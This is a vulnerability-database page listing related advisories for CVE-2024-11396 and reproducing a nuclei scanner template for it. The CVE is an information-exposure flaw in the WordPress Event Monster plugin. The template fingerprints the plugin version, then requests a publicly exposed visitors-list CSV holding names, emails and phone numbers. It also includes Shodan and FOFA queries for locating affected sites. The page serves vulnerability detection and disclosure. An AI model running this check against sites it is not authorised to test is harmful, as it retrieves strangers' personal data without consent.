Lucene search
+L

Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export

🗓️ 17 Aug 2026 03:58:01Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 55 Views

Event Monster plugin for WordPress exposes visitor data via public CSV file export in version 1.4.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
WordPress Event Monster 1.4.3 Information Disclosure Vulnerability
15 Jan 202500:00
zdt
circl
Circl
CVE-2024-11396
14 Jan 202501:15
circl
cnnvd
CNNVD
WordPress plugin Event Monster 安全漏洞
13 Jan 202500:00
cnnvd
cve
CVE
CVE-2024-11396
13 Jan 202523:21
cve
cvelist
Cvelist
CVE-2024-11396 Event monster <= 1.4.3 - Information Exposure Via Visitors List Export
13 Jan 202523:21
cvelist
nvd
NVD
CVE-2024-11396
14 Jan 202501:15
nvd
osv
OSV
CVE-2024-11396
14 Jan 202501:15
osv
packetstorm
Packet Storm
WordPress Event Monster 1.4.3 Information Disclosure
14 Jan 202500:00
packetstorm
redhatcve
RedhatCVE
CVE-2024-11396
23 May 202507:51
redhatcve
vulnrichment
Vulnrichment
CVE-2024-11396 Event monster <= 1.4.3 - Information Exposure Via Visitors List Export
13 Jan 202523:21
vulnrichment
Rows per page
id: CVE-2024-11396

info:
  name: Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export
  author: s4e-io
  severity: medium
  description: |
    The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.
  impact: |
    Unauthenticated attackers can access CSV files containing sensitive visitor information including names, emails, and phone numbers.
  remediation: |
    Update Event Monster plugin to a version newer than 1.4.3.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-11396
    - https://plugins.trac.wordpress.org/browser/event-monster/tags/1.4.3/em-ajax-prossesing/em-visitor-ajax.php#L92
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11396
    - https://github.com/advisories/GHSA-6x4w-fvqp-6jvc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-11396
    cwe-id: CWE-359
    epss-score: 0.02015
    epss-percentile: 0.79233
  metadata:
    verified: true
    max-request: 2
    vendor: a-wp-life
    product: event-monster
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/event-monster"
    fofa-query: body="wp-content/plugins/event-monster"
  tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak,passive,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 1.4.3")'
          - 'contains(body, "event-monster")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        internal: true
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"

  - raw:
      - |
        GET /wp-content/uploads/visitors-list.csv HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "First Name, Last Name, Email, Phone, Event")'
          - 'contains(content_type, "text/csv")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502204b0b78b4b86bfd0493d819763c35443f8f2262752ea3437aedc71331bc2113d3022100e85784eaff7e60e169b30e5e208a409034c6d05e5e1e3dd63a6c39c6714c6bd1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.15.3
EPSS0.02015
SSVC
55